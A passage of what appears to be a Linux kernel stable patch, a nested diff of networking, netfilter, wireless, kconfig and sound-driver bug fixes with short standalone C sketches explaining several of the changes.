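relaxed atomic, sketched below (a userspace stand-in, not the kernel macros):

#include <stdatomic.h>
#include <stdio.h>

static _Atomic unsigned int needed_headroom;

/* WRITE_ONCE()-style publish: a single, non-torn store. */
static void update_headroom(unsigned int headroom)
{
	if (headroom > atomic_load_explicit(&needed_headroom,
					    memory_order_relaxed))
		atomic_store_explicit(&needed_headroom, headroom,
				      memory_order_relaxed);
}

int main(void)
{
	update_headroom(64);
	update_headroom(32); /* smaller: no store */
	printf("%u\n", atomic_load_explicit(&needed_headroom,
					    memory_order_relaxed));
	return 0;
}
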
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index c69f4d966024c..925594dbeb929 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -3608,7 +3608,7 @@ struct sk_buff *tcp_make_synack(const struct sock *sk, struct dst_entry *dst,
+ 	th->window = htons(min(req->rsk_rcv_wnd, 65535U));
+ 	tcp_options_write(th, NULL, &opts);
+ 	th->doff = (tcp_header_size >> 2);
+-	__TCP_INC_STATS(sock_net(sk), TCP_MIB_OUTSEGS);
++	TCP_INC_STATS(sock_net(sk), TCP_MIB_OUTSEGS);
+ 
+ #ifdef CONFIG_TCP_MD5SIG
+ 	/* Okay, we have all we need - do the md5 hash if needed */
+diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
+index 2fb4c6ad72432..afc922c88d179 100644
+--- a/net/ipv6/ip6_tunnel.c
++++ b/net/ipv6/ip6_tunnel.c
+@@ -1241,8 +1241,8 @@ route_lookup:
+ 	 */
+ 	max_headroom = LL_RESERVED_SPACE(dst->dev) + sizeof(struct ipv6hdr)
+ 			+ dst->header_len + t->hlen;
+-	if (max_headroom > dev->needed_headroom)
+-		dev->needed_headroom = max_headroom;
++	if (max_headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, max_headroom);
+ 
+ 	err = ip6_tnl_encap(skb, t, &proto, fl6);
+ 	if (err)
+diff --git a/net/iucv/iucv.c b/net/iucv/iucv.c
+index eb0295d900395..fc3fddeb6f36d 100644
+--- a/net/iucv/iucv.c
++++ b/net/iucv/iucv.c
+@@ -83,7 +83,7 @@ struct iucv_irq_data {
+ 	u16 ippathid;
+ 	u8  ipflags1;
+ 	u8  iptype;
+-	u32 res2[8];
++	u32 res2[9];
+ };
+ 
+ struct iucv_irq_list {
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 5e38a0abbabae..1c69e476f4ad6 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -987,9 +987,13 @@ out:
+ 	return ret;
+ }
+ 
++static struct lock_class_key mptcp_slock_keys[2];
++static struct lock_class_key mptcp_keys[2];
++
+ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 					    struct mptcp_pm_addr_entry *entry)
+ {
++	bool is_ipv6 = sk->sk_family == AF_INET6;
+ 	int addrlen = sizeof(struct sockaddr_in);
+ 	struct sockaddr_storage addr;
+ 	struct socket *ssock;
+@@ -1006,6 +1010,18 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 	if (!newsk)
+ 		return -EINVAL;
+ 
++	/* The subflow socket lock is acquired in a nested manner to the msk one
++	 * in several places, even by the TCP stack, and this msk is a kernel
++	 * socket: lockdep complains. Instead of propagating the _nested
++	 * modifiers in several places, re-init the lock class for the msk
++	 * socket to an mptcp specific one.
++	 */
++	sock_lock_init_class_and_name(newsk,
++				      is_ipv6 ? "mlock-AF_INET6" : "mlock-AF_INET",
++				      &mptcp_slock_keys[is_ipv6],
++				      is_ipv6 ? "msk_lock-AF_INET6" : "msk_lock-AF_INET",
++				      &mptcp_keys[is_ipv6]);
++
+ 	lock_sock(newsk);
+ 	ssock = __mptcp_nmpc_socket(mptcp_sk(newsk));
+ 	release_sock(newsk);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index c4971bc42f60f..1e10a38ccf9d0 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -358,7 +358,6 @@ void mptcp_subflow_reset(struct sock *ssk)
+ 	/* must hold: tcp_done() could drop last reference on parent */
+ 	sock_hold(sk);
+ 
+-	tcp_set_state(ssk, TCP_CLOSE);
+ 	tcp_send_active_reset(ssk, GFP_ATOMIC);
+ 	tcp_done(ssk);
+ 	if (!test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &mptcp_sk(sk)->flags) &&
+@@ -560,7 +559,7 @@ static struct request_sock_ops mptcp_subflow_v6_request_sock_ops __ro_after_init
+ static struct tcp_request_sock_ops subflow_request_sock_ipv6_ops __ro_after_init;
+ static struct inet_connection_sock_af_ops subflow_v6_specific __ro_after_init;
+ static struct inet_connection_sock_af_ops subflow_v6m_specific __ro_after_init;
+-static struct proto tcpv6_prot_override;
++static struct proto tcpv6_prot_override __ro_after_init;
+ 
+ static int subflow_v6_conn_request(struct sock *sk, struct sk_buff *skb)
+ {
+@@ -846,7 +845,7 @@ dispose_child:
+ }
+ 
+ static struct inet_connection_sock_af_ops subflow_specific __ro_after_init;
+-static struct proto tcp_prot_override;
++static struct proto tcp_prot_override __ro_after_init;
+ 
+ enum mapping_status {
+ 	MAPPING_OK,
+@@ -1376,6 +1375,13 @@ static void subflow_error_report(struct sock *ssk)
+ {
+ 	struct sock *sk = mptcp_subflow_ctx(ssk)->conn;
+ 
++	/* bail early if this is a no-op, so that we avoid introducing a
++	 * problematic lockdep dependency between TCP accept queue lock
++	 * and msk socket spinlock
++	 */
++	if (!sk->sk_socket)
++		return;
++
+ 	mptcp_data_lock(sk);
+ 	if (!sock_owned_by_user(sk))
+ 		__mptcp_error_report(sk);
+diff --git a/net/netfilter/nft_masq.c b/net/netfilter/nft_masq.c
+index 2a0adc497bbb4..026b4f87d96cc 100644
+--- a/net/netfilter/nft_masq.c
++++ b/net/netfilter/nft_masq.c
+@@ -43,7 +43,7 @@ static int nft_masq_init(const struct nft_ctx *ctx,
+ 			 const struct nft_expr *expr,
+ 			 const struct nlattr * const tb[])
+ {
+-	u32 plen = sizeof_field(struct nf_nat_range, min_addr.all);
++	u32 plen = sizeof_field(struct nf_nat_range, min_proto.all);
+ 	struct nft_masq *priv = nft_expr_priv(expr);
+ 	int err;
+ 
+diff --git a/net/netfilter/nft_nat.c b/net/netfilter/nft_nat.c
+index e5fd6995e4bf3..353c090f88917 100644
+--- a/net/netfilter/nft_nat.c
++++ b/net/netfilter/nft_nat.c
+@@ -226,7 +226,7 @@ static int nft_nat_init(const struct nft_ctx *ctx, const struct nft_expr *expr,
+ 		priv->flags |= NF_NAT_RANGE_MAP_IPS;
+ 	}
+ 
+-	plen = sizeof_field(struct nf_nat_range, min_addr.all);
++	plen = sizeof_field(struct nf_nat_range, min_proto.all);
+ 	if (tb[NFTA_NAT_REG_PROTO_MIN]) {
+ 		err = nft_parse_register_load(tb[NFTA_NAT_REG_PROTO_MIN],
+ 					      &priv->sreg_proto_min, plen);
+diff --git a/net/netfilter/nft_redir.c b/net/netfilter/nft_redir.c
+index 5086adfe731cb..5ed64b2bd15e8 100644
+--- a/net/netfilter/nft_redir.c
++++ b/net/netfilter/nft_redir.c
+@@ -48,7 +48,7 @@ static int nft_redir_init(const struct nft_ctx *ctx,
+ 	unsigned int plen;
+ 	int err;
+ 
+-	plen = sizeof_field(struct nf_nat_range, min_addr.all);
++	plen = sizeof_field(struct nf_nat_range, min_proto.all);
+ 	if (tb[NFTA_REDIR_REG_PROTO_MIN]) {
+ 		err = nft_parse_register_load(tb[NFTA_REDIR_REG_PROTO_MIN],
+ 					      &priv->sreg_proto_min, plen);
+@@ -235,7 +235,7 @@ static struct nft_expr_type nft_redir_inet_type __read_mostly = {
+ 	.name		= "redir",
+ 	.ops		= &nft_redir_inet_ops,
+ 	.policy		= nft_redir_policy,
+-	.maxattr	= NFTA_MASQ_MAX,
++	.maxattr	= NFTA_REDIR_MAX,
+ 	.owner		= THIS_MODULE,
+ };
+ 
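
All three nft fixes above swap min_addr.all for min_proto.all in the
sizeof_field() length used to validate the register load: address ranges and
protocol (port) ranges have different widths. The kernel macro reduces to a
null-pointer member sizeof, reproducible standalone (the struct here is a toy
layout, not the real nf_nat_range):

#include <stdio.h>

/* Same shape as the kernel's sizeof_field(TYPE, MEMBER). */
#define sizeof_field(TYPE, MEMBER) sizeof(((TYPE *)0)->MEMBER)

struct toy_nat_range {
	struct { unsigned char all[16]; } min_addr;  /* IPv6-sized address */
	struct { unsigned short all; }    min_proto; /* 16-bit port */
};

int main(void)
{
	/* Picking the wrong member yields the wrong expected length. */
	printf("addr len  = %zu\n", sizeof_field(struct toy_nat_range, min_addr.all));
	printf("proto len = %zu\n", sizeof_field(struct toy_nat_range, min_proto.all));
	return 0;
}
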
+diff --git a/net/smc/smc_cdc.c b/net/smc/smc_cdc.c
+index 53f63bfbaf5f9..89105e95b4523 100644
+--- a/net/smc/smc_cdc.c
++++ b/net/smc/smc_cdc.c
+@@ -114,6 +114,9 @@ int smc_cdc_msg_send(struct smc_connection *conn,
+ 	union smc_host_cursor cfed;
+ 	int rc;
+ 
++	if (unlikely(!READ_ONCE(conn->sndbuf_desc)))
++		return -ENOBUFS;
++
+ 	smc_cdc_add_pending_send(conn, pend);
+ 
+ 	conn->tx_cdc_seq++;
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index c19d4b7c1f28a..0208dfb353456 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -1459,7 +1459,7 @@ static void __smc_lgr_terminate(struct smc_link_group *lgr, bool soft)
+ 	if (lgr->terminating)
+ 		return;	/* lgr already terminating */
+ 	/* cancel free_work sync, will terminate when lgr->freeing is set */
+-	cancel_delayed_work_sync(&lgr->free_work);
++	cancel_delayed_work(&lgr->free_work);
+ 	lgr->terminating = 1;
+ 
+ 	/* kill remaining link group connections */
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 4d4de49f7ab65..7320d676ce3a5 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -8815,7 +8815,7 @@ static bool cfg80211_off_channel_oper_allowed(struct wireless_dev *wdev,
+ 		struct cfg80211_chan_def *chandef;
+ 
+ 		chandef = wdev_chandef(wdev, link_id);
+-		if (!chandef)
++		if (!chandef || !chandef->chan)
+ 			continue;
+ 
+ 		/*
+@@ -10699,8 +10699,7 @@ static int nl80211_crypto_settings(struct cfg80211_registered_device *rdev,
+ 
+ static struct cfg80211_bss *nl80211_assoc_bss(struct cfg80211_registered_device *rdev,
+ 					      const u8 *ssid, int ssid_len,
+-					      struct nlattr **attrs,
+-					      const u8 **bssid_out)
++					      struct nlattr **attrs)
+ {
+ 	struct ieee80211_channel *chan;
+ 	struct cfg80211_bss *bss;
+@@ -10727,7 +10726,6 @@ static struct cfg80211_bss *nl80211_assoc_bss(struct cfg80211_registered_device
+ 	if (!bss)
+ 		return ERR_PTR(-ENOENT);
+ 
+-	*bssid_out = bssid;
+ 	return bss;
+ }
+ 
+@@ -10737,7 +10735,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 	struct net_device *dev = info->user_ptr[1];
+ 	struct cfg80211_assoc_request req = {};
+ 	struct nlattr **attrs = NULL;
+-	const u8 *bssid, *ssid;
++	const u8 *ap_addr, *ssid;
+ 	unsigned int link_id;
+ 	int err, ssid_len;
+ 
+@@ -10874,6 +10872,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 			return -EINVAL;
+ 
+ 		req.ap_mld_addr = nla_data(info->attrs[NL80211_ATTR_MLD_ADDR]);
++		ap_addr = req.ap_mld_addr;
+ 
+ 		attrs = kzalloc(attrsize, GFP_KERNEL);
+ 		if (!attrs)
+@@ -10899,8 +10898,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 				goto free;
+ 			}
+ 			req.links[link_id].bss =
+-				nl80211_assoc_bss(rdev, ssid, ssid_len, attrs,
+-						  &bssid);
++				nl80211_assoc_bss(rdev, ssid, ssid_len, attrs);
+ 			if (IS_ERR(req.links[link_id].bss)) {
+ 				err = PTR_ERR(req.links[link_id].bss);
+ 				req.links[link_id].bss = NULL;
+@@ -10951,10 +10949,10 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 		if (req.link_id >= 0)
+ 			return -EINVAL;
+ 
+-		req.bss = nl80211_assoc_bss(rdev, ssid, ssid_len, info->attrs,
+-					    &bssid);
++		req.bss = nl80211_assoc_bss(rdev, ssid, ssid_len, info->attrs);
+ 		if (IS_ERR(req.bss))
+ 			return PTR_ERR(req.bss);
++		ap_addr = req.bss->bssid;
+ 	}
+ 
+ 	err = nl80211_crypto_settings(rdev, info, &req.crypto, 1);
+@@ -10967,7 +10965,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 			dev->ieee80211_ptr->conn_owner_nlportid =
+ 				info->snd_portid;
+ 			memcpy(dev->ieee80211_ptr->disconnect_bssid,
+-			       bssid, ETH_ALEN);
++			       ap_addr, ETH_ALEN);
+ 		}
+ 
+ 		wdev_unlock(dev->ieee80211_ptr);
+diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
+index 0f88cb6fc3c22..2f4cf976b59a3 100644
+--- a/net/xfrm/xfrm_state.c
++++ b/net/xfrm/xfrm_state.c
+@@ -2649,11 +2649,6 @@ int __xfrm_init_state(struct xfrm_state *x, bool init_replay, bool offload,
+ 			goto error;
+ 		}
+ 
+-		if (!(inner_mode->flags & XFRM_MODE_FLAG_TUNNEL)) {
+-			NL_SET_ERR_MSG(extack, "Only tunnel modes can accommodate an AF_UNSPEC selector");
+-			goto error;
+-		}
+-
+ 		x->inner_mode = *inner_mode;
+ 
+ 		if (x->props.family == AF_INET)
+diff --git a/scripts/kconfig/confdata.c b/scripts/kconfig/confdata.c
+index b7c9f1dd5e422..992575f1e9769 100644
+--- a/scripts/kconfig/confdata.c
++++ b/scripts/kconfig/confdata.c
+@@ -1226,10 +1226,12 @@ static void (*conf_changed_callback)(void);
+ 
+ void conf_set_changed(bool val)
+ {
+-	if (conf_changed_callback && conf_changed != val)
+-		conf_changed_callback();
++	bool changed = conf_changed != val;
+ 
+ 	conf_changed = val;
++
++	if (conf_changed_callback && changed)
++		conf_changed_callback();
+ }
+ 
+ bool conf_get_changed(void)
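
The confdata.c fix reorders conf_set_changed() so the state is updated before
the callback fires; previously the callback observed the stale value. The
pattern, reduced to a standalone sketch:

#include <stdbool.h>
#include <stdio.h>

static bool conf_changed;
static void (*callback)(void);

static void on_change(void)
{
	/* With the fix, this sees the already-updated value. */
	printf("callback sees conf_changed=%d\n", conf_changed);
}

static void conf_set_changed(bool val)
{
	bool changed = conf_changed != val;

	conf_changed = val;      /* update state first */

	if (callback && changed) /* then notify */
		callback();
}

int main(void)
{
	callback = on_change;
	conf_set_changed(true);  /* prints conf_changed=1 */
	conf_set_changed(true);  /* unchanged: no callback */
	return 0;
}
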
+diff --git a/sound/hda/intel-dsp-config.c b/sound/hda/intel-dsp-config.c
+index ae31bb1275940..317bdf6dcbef4 100644
+--- a/sound/hda/intel-dsp-config.c
++++ b/sound/hda/intel-dsp-config.c
+@@ -472,6 +472,15 @@ static const struct config_entry config_table[] = {
+ 	},
+ #endif
+ 
++/* Meteor Lake */
++#if IS_ENABLED(CONFIG_SND_SOC_SOF_METEORLAKE)
++	/* Meteorlake-P */
++	{
++		.flags = FLAG_SOF | FLAG_SOF_ONLY_IF_DMIC_OR_SOUNDWIRE,
++		.device = 0x7e28,
++	},
++#endif
++
+ };
+ 
+ static const struct config_entry *snd_intel_dsp_find_config
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 81c4a45254ff2..77a592f219472 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -328,14 +328,15 @@ enum {
+ #define needs_eld_notify_link(chip)	false
+ #endif
+ 
+-#define CONTROLLER_IN_GPU(pci) (((pci)->device == 0x0a0c) || \
++#define CONTROLLER_IN_GPU(pci) (((pci)->vendor == 0x8086) &&         \
++				       (((pci)->device == 0x0a0c) || \
+ 					((pci)->device == 0x0c0c) || \
+ 					((pci)->device == 0x0d0c) || \
+ 					((pci)->device == 0x160c) || \
+ 					((pci)->device == 0x490d) || \
+ 					((pci)->device == 0x4f90) || \
+ 					((pci)->device == 0x4f91) || \
+-					((pci)->device == 0x4f92))
++					((pci)->device == 0x4f92)))
+ 
+ #define IS_BXT(pci) ((pci)->vendor == 0x8086 && (pci)->device == 0x5a98)
+ 
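
The CONTROLLER_IN_GPU() fix puts a PCI vendor test in front of the device-ID
list, so another vendor's device that happens to reuse one of those IDs no
longer matches. Reduced to a standalone check (toy IDs, not the full list):

#include <stdio.h>

struct pci_id { unsigned short vendor, device; };

#define PCI_VENDOR_INTEL 0x8086

/* Fixed shape: the vendor test short-circuits the device-ID list. */
static int controller_in_gpu(const struct pci_id *pci)
{
	return pci->vendor == PCI_VENDOR_INTEL &&
	       (pci->device == 0x0a0c || pci->device == 0x4f92);
}

int main(void)
{
	struct pci_id intel = { 0x8086, 0x4f92 };
	struct pci_id other = { 0x1234, 0x4f92 }; /* same device ID, wrong vendor */

	printf("%d %d\n", controller_in_gpu(&intel), controller_in_gpu(&other));
	return 0;
}
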
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index d4819890374b5..28ac6c159b2a2 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9446,6 +9446,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b8a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8b, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+@@ -9538,6 +9539,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x144d, 0xc830, "Samsung Galaxy Book Ion (NT950XCJ-X716A)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc832, "Samsung Galaxy Book Flex Alpha (NP730QCJ)", ALC256_FIXUP_SAMSUNG_HEADPHONE_VERY_QUIET),
+ 	SND_PCI_QUIRK(0x144d, 0xca03, "Samsung Galaxy Book2 Pro 360 (NP930QED)", ALC298_FIXUP_SAMSUNG_AMP),
++	SND_PCI_QUIRK(0x144d, 0xc868, "Samsung Galaxy Book2 Pro (NP930XED)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x1458, 0xfa53, "Gigabyte BXBT-2807", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1462, 0xb120, "MSI Cubi MS-B120", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1462, 0xb171, "Cubi N 8GL (MS-B171)", ALC283_FIXUP_HEADSET_MIC),
+diff --git a/sound/soc/intel/common/soc-acpi-intel-adl-match.c b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+index 68b4fa352354d..0102574025e90 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-adl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+@@ -547,7 +547,7 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_adl_machines[] = {
+ 	{
+ 		.comp_ids = &essx_83x6,
+ 		.drv_name = "sof-essx8336",
+-		.sof_tplg_filename = "sof-adl-es83x6", /* the tplg suffix is added at run time */
++		.sof_tplg_filename = "sof-adl-es8336", /* the tplg suffix is added at run time */
+ 		.tplg_quirk_mask = SND_SOC_ACPI_TPLG_INTEL_SSP_NUMBER |
+ 					SND_SOC_ACPI_TPLG_INTEL_SSP_MSB |
+ 					SND_SOC_ACPI_TPLG_INTEL_DMIC_NUMBER,
+diff --git a/sound/soc/qcom/qdsp6/q6prm.c b/sound/soc/qcom/qdsp6/q6prm.c
+index cda33ded29bed..41a29047ff010 100644
+--- a/sound/soc/qcom/qdsp6/q6prm.c
++++ b/sound/soc/qcom/qdsp6/q6prm.c
+@@ -183,9 +183,9 @@ int q6prm_set_lpass_clock(struct device *dev, int clk_id, int clk_attr, int clk_
+ 			  unsigned int freq)
+ {
+ 	if (freq)
+-		return q6prm_request_lpass_clock(dev, clk_id, clk_attr, clk_attr, freq);
++		return q6prm_request_lpass_clock(dev, clk_id, clk_attr, clk_root, freq);
+ 
+-	return q6prm_release_lpass_clock(dev, clk_id, clk_attr, clk_attr, freq);
++	return q6prm_release_lpass_clock(dev, clk_id, clk_attr, clk_root, freq);
+ }
+ EXPORT_SYMBOL_GPL(q6prm_set_lpass_clock);
+ 
+diff --git a/sound/soc/sof/intel/pci-apl.c b/sound/soc/sof/intel/pci-apl.c
+index 998e219011f01..ad8431b13125d 100644
+--- a/sound/soc/sof/intel/pci-apl.c
++++ b/sound/soc/sof/intel/pci-apl.c
+@@ -72,6 +72,7 @@ static const struct sof_dev_desc glk_desc = {
+ 	.nocodec_tplg_filename = "sof-glk-nocodec.tplg",
+ 	.ops = &sof_apl_ops,
+ 	.ops_init = sof_apl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-cnl.c b/sound/soc/sof/intel/pci-cnl.c
+index c797356f7028b..33677ce8de41d 100644
+--- a/sound/soc/sof/intel/pci-cnl.c
++++ b/sound/soc/sof/intel/pci-cnl.c
+@@ -45,6 +45,7 @@ static const struct sof_dev_desc cnl_desc = {
+ 	.nocodec_tplg_filename = "sof-cnl-nocodec.tplg",
+ 	.ops = &sof_cnl_ops,
+ 	.ops_init = sof_cnl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc cfl_desc = {
+@@ -102,6 +103,7 @@ static const struct sof_dev_desc cml_desc = {
+ 	.nocodec_tplg_filename = "sof-cnl-nocodec.tplg",
+ 	.ops = &sof_cnl_ops,
+ 	.ops_init = sof_cnl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-icl.c b/sound/soc/sof/intel/pci-icl.c
+index 48f24f8ace261..9a42a4ea1a5ea 100644
+--- a/sound/soc/sof/intel/pci-icl.c
++++ b/sound/soc/sof/intel/pci-icl.c
+@@ -73,6 +73,7 @@ static const struct sof_dev_desc jsl_desc = {
+ 	.nocodec_tplg_filename = "sof-jsl-nocodec.tplg",
+ 	.ops = &sof_cnl_ops,
+ 	.ops_init = sof_cnl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-mtl.c b/sound/soc/sof/intel/pci-mtl.c
+index 9f39da984e9fa..4dae256536bf4 100644
+--- a/sound/soc/sof/intel/pci-mtl.c
++++ b/sound/soc/sof/intel/pci-mtl.c
+@@ -43,6 +43,7 @@ static const struct sof_dev_desc mtl_desc = {
+ 	.nocodec_tplg_filename = "sof-mtl-nocodec.tplg",
+ 	.ops = &sof_mtl_ops,
+ 	.ops_init = sof_mtl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-skl.c b/sound/soc/sof/intel/pci-skl.c
+index 3a99dc444f92e..5b4bccf819658 100644
+--- a/sound/soc/sof/intel/pci-skl.c
++++ b/sound/soc/sof/intel/pci-skl.c
+@@ -38,6 +38,7 @@ static struct sof_dev_desc skl_desc = {
+ 	.nocodec_tplg_filename = "sof-skl-nocodec.tplg",
+ 	.ops = &sof_skl_ops,
+ 	.ops_init = sof_skl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static struct sof_dev_desc kbl_desc = {
+@@ -61,6 +62,7 @@ static struct sof_dev_desc kbl_desc = {
+ 	.nocodec_tplg_filename = "sof-kbl-nocodec.tplg",
+ 	.ops = &sof_skl_ops,
+ 	.ops_init = sof_skl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-tgl.c b/sound/soc/sof/intel/pci-tgl.c
+index 4cfe4f242fc5e..ccaf0ff9eb1c3 100644
+--- a/sound/soc/sof/intel/pci-tgl.c
++++ b/sound/soc/sof/intel/pci-tgl.c
+@@ -45,6 +45,7 @@ static const struct sof_dev_desc tgl_desc = {
+ 	.nocodec_tplg_filename = "sof-tgl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc tglh_desc = {
+@@ -101,6 +102,7 @@ static const struct sof_dev_desc ehl_desc = {
+ 	.nocodec_tplg_filename = "sof-ehl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc adls_desc = {
+@@ -129,6 +131,7 @@ static const struct sof_dev_desc adls_desc = {
+ 	.nocodec_tplg_filename = "sof-adl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc adl_desc = {
+@@ -157,6 +160,7 @@ static const struct sof_dev_desc adl_desc = {
+ 	.nocodec_tplg_filename = "sof-adl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc adl_n_desc = {
+@@ -185,6 +189,7 @@ static const struct sof_dev_desc adl_n_desc = {
+ 	.nocodec_tplg_filename = "sof-adl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc rpls_desc = {
+@@ -213,6 +218,7 @@ static const struct sof_dev_desc rpls_desc = {
+ 	.nocodec_tplg_filename = "sof-rpl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc rpl_desc = {
+@@ -241,6 +247,7 @@ static const struct sof_dev_desc rpl_desc = {
+ 	.nocodec_tplg_filename = "sof-rpl-nocodec.tplg",
+ 	.ops = &sof_tgl_ops,
+ 	.ops_init = sof_tgl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/ipc4-topology.h b/sound/soc/sof/ipc4-topology.h
+index 0aa87a8add5d3..2363a7cc0b57d 100644
+--- a/sound/soc/sof/ipc4-topology.h
++++ b/sound/soc/sof/ipc4-topology.h
+@@ -46,7 +46,7 @@
+ #define SOF_IPC4_NODE_INDEX_INTEL_SSP(x) (((x) & 0xf) << 4)
+ 
+ /* Node ID for DMIC type DAI copiers */
+-#define SOF_IPC4_NODE_INDEX_INTEL_DMIC(x) (((x) & 0x7) << 5)
++#define SOF_IPC4_NODE_INDEX_INTEL_DMIC(x) ((x) & 0x7)
+ 
+ #define SOF_IPC4_GAIN_ALL_CHANNELS_MASK 0xffffffff
+ #define SOF_IPC4_VOL_ZERO_DB	0x7fffffff
+diff --git a/tools/testing/selftests/lib.mk b/tools/testing/selftests/lib.mk
+index f7900e75d2306..05400462c7799 100644
+--- a/tools/testing/selftests/lib.mk
++++ b/tools/testing/selftests/lib.mk
+@@ -10,12 +10,14 @@ endif
+ CLANG_TARGET_FLAGS_arm          := arm-linux-gnueabi
+ CLANG_TARGET_FLAGS_arm64        := aarch64-linux-gnu
+ CLANG_TARGET_FLAGS_hexagon      := hexagon-linux-musl
++CLANG_TARGET_FLAGS_i386         := i386-linux-gnu
+ CLANG_TARGET_FLAGS_m68k         := m68k-linux-gnu
+ CLANG_TARGET_FLAGS_mips         := mipsel-linux-gnu
+ CLANG_TARGET_FLAGS_powerpc      := powerpc64le-linux-gnu
+ CLANG_TARGET_FLAGS_riscv        := riscv64-linux-gnu
+ CLANG_TARGET_FLAGS_s390         := s390x-linux-gnu
+ CLANG_TARGET_FLAGS_x86          := x86_64-linux-gnu
++CLANG_TARGET_FLAGS_x86_64       := x86_64-linux-gnu
+ CLANG_TARGET_FLAGS              := $(CLANG_TARGET_FLAGS_$(ARCH))
+ 
+ ifeq ($(CROSS_COMPILE),)
+diff --git a/tools/testing/selftests/net/devlink_port_split.py b/tools/testing/selftests/net/devlink_port_split.py
+index 2b5d6ff873738..2d84c7a0be6b2 100755
+--- a/tools/testing/selftests/net/devlink_port_split.py
++++ b/tools/testing/selftests/net/devlink_port_split.py
+@@ -59,6 +59,8 @@ class devlink_ports(object):
+         assert stderr == ""
+         ports = json.loads(stdout)['port']
+ 
++        validate_devlink_output(ports, 'flavour')
++
+         for port in ports:
+             if dev in port:
